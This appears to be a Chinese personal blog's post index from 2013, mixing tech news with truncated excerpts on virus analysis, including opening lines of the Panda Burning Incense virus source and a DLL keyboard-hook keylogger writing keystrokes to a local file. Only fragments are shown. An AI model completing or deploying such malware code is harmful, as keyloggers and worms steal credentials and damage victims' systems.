2013年8月1日
"QQ尾巴病毒"核心技术的实现原理分析
摘要: 声明:本文旨在探讨技术,请读者不要使用文章中的方法进行任何破坏。 2003这一年里,QQ尾巴病毒可以算是风光了一阵子。它利用IE的邮件头漏洞在QQ上疯狂传播。中毒者在给别人发信息时,病毒会自动在信息文本的后边添上一句话,话的内容多种多样,总之就是希望信息的接收者点击这句话中的URL,成为下一个中毒者。下图就是染毒后的QQ发送的消息,其中中毒者只打了“你好”两个字,其它的就全是病毒的杰作了。 下面我将要讨论的,就是QQ尾巴病毒使用的这一技术。由于病毒的源代码无法获得,所以以下的代码全是我主观臆断所得,所幸的是效果基本与病毒本身一致。 粘贴尾巴 首先的一个最简单的问题是如何添加文本。这一技术... 阅读全文
posted @ 2013-08-01 14:40 5t4rk 阅读(479) 评论(0) 推荐(0) 编辑
熊猫烧香病毒源代码学习(只学习技术,破坏者责任自负)
摘要: program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 Ico... 阅读全文
posted @ 2013-08-01 14:13 5t4rk 阅读(610) 评论(0) 推荐(0) 编辑
  2013年7月30日
拒绝服务漏洞分析研究报告
摘要: 分析研究报告漏洞介绍:适用环境:全补丁xp,2003系统漏洞发现时间:2013-3-4漏洞起因:ImagePath项读取的长度未做检查和限定,导致后面的复制有问题影响系统:xp,2003危害本地拒绝服务攻击所需条件:填充注册表ImagePath修改成REG_MULTI_SZ,填充数据的长度Len(D... 阅读全文
posted @ 2013-07-30 16:59 5t4rk 阅读(368) 评论(0) 推荐(0) 编辑
汽车也能被入侵:美黑客本周将公布入侵方式
摘要: 两名美国安全研究人员将于本周在Def Con黑客大会上公布丰田普锐斯和福特翼虎的计算机网络入侵方式,希望吸引更多研究人员参与到相关项目中。汽车黑客并非新领域,但相关信息一直对外保密。不过,这种情况有可能会改变,因为查理·米勒(Charlie Miller)和克里斯·瓦拉塞克(Chris Valase... 阅读全文
posted @ 2013-07-30 16:17 5t4rk 阅读(350) 评论(0) 推荐(0) 编辑
  2013年7月28日
完美实现自己的GetProcAddress函数(转载)
摘要: 我们知道kernel32.dll里有一个GetProcAddress函数,可以找到模块中的函数地址,函数原型是这样的: WINBASEAPI FARPROC WINAPI GetProcAddress( IN HMODULE hModule, IN LPCSTR lpProcName ... 阅读全文
posted @ 2013-07-28 23:12 5t4rk 阅读(2892) 评论(0) 推荐(0) 编辑
  2013年7月26日
Android 4.3正式发布:四大新功能一览
摘要: 在旧金山举行的新品发布会上,Google正式发布了Android 4.3,代号仍为“Jelly Bean”。此次更新并没有太大改变,只是紧跟4.1、4.2步伐,新增了低功耗蓝牙、多用户登录等一系列功能,并对其他工具进行改进和提升。7月25日,在旧金山举行的新品发布会上,Google正式发布了Andr... 阅读全文
posted @ 2013-07-26 22:27 5t4rk 阅读(387) 评论(0) 推荐(0) 编辑
  2013年7月22日
微软WTL模板库完整版安装(VS2010+windows7X64位环境下)分享
摘要: 一:简介想必大家对于微软的MFC应该都比较熟悉。但是WTL可能很多人比较陌生吧。下面我就简单的说说这个库。首先对这个库的做个简单的介绍吧。WTL 是 Windows Template Library 的缩写,由微软的ATL(Active Template Library) 小组开发,主要是基于 AT... 阅读全文
posted @ 2013-07-22 22:30 5t4rk 阅读(718) 评论(0) 推荐(0) 编辑
部分SIM卡被曝存安全漏洞:7.5亿部手机受牵连
摘要: 7月22日消息,据国外媒体报道,一安全研究人员发现部分移动SIM卡所使用的加密方式存在一个安全漏洞,可能会导致手机被黑客远程控制。DES数据加密标准的SIM卡——DES是一种较旧的标准,目前正被部分厂商逐步淘汰,但仍有数亿张SIM卡使用。德国安全研究公司Security Research Labs创... 阅读全文
posted @ 2013-07-22 08:45 5t4rk 阅读(205) 评论(0) 推荐(0) 编辑
  2013年7月21日
基于SOCK4网络协议的代理服务器端代码示例
摘要: //**********************************************************************#include #include #include #include #include #define BufferSize 1024*8 // 8k Buffer#define SOCKS4_GRANT 90#define SOCKS4_REJECT 91#pragma comment(lib,"ws2_32.lib")#pragma comment(lib,"wsock32.lib")// Some Str 阅读全文
posted @ 2013-07-21 17:34 5t4rk 阅读(1474) 评论(0) 推荐(0) 编辑
动态链接库dll键盘钩子后台记录代码示例
摘要: //.header#ifndef _DLLHOOK_H_#define _DLLHOOK_H_#include #define DLL_EXPORT_FUN __declspec(dllexport)DLL_EXPORT_FUN BOOL InstallHook();DLL_EXPORT_FUN BOOL UninstallHook();#endif//.cpp#include #include #include "DllHook.h"#define Password "C:\\result.txt"#define TextLength 20#defin 阅读全文
posted @ 2013-07-21 17:15 5t4rk 阅读(463) 评论(0) 推荐(0) 编辑
  2013年7月20日
10 notorious computer virus
摘要: The history of computer virus is the same as computer history. With more and more powerful computers, virus also are smarter and harder to be detected... 阅读全文
posted @ 2013-07-20 15:26 5t4rk 阅读(316) 评论(0) 推荐(0) 编辑
小米即将完成新一轮融资 传估值近百亿美元
摘要: 小米日前在内部举行庆功会,小米CEO雷军会上透露2013年上半年业绩达132.7亿,共售出703万台手机,上半年营收超去年全年126亿。截至2013年6月底,包括中国大陆、香港地区、台湾地区三地小米共有1422万手机用户。腾讯科技 雷建平 7月18日报道如果你认为小米仅是在举办庆功会,就大错特错,实... 阅读全文
posted @ 2013-07-20 15:17 5t4rk 阅读(174) 评论(0) 推荐(0) 编辑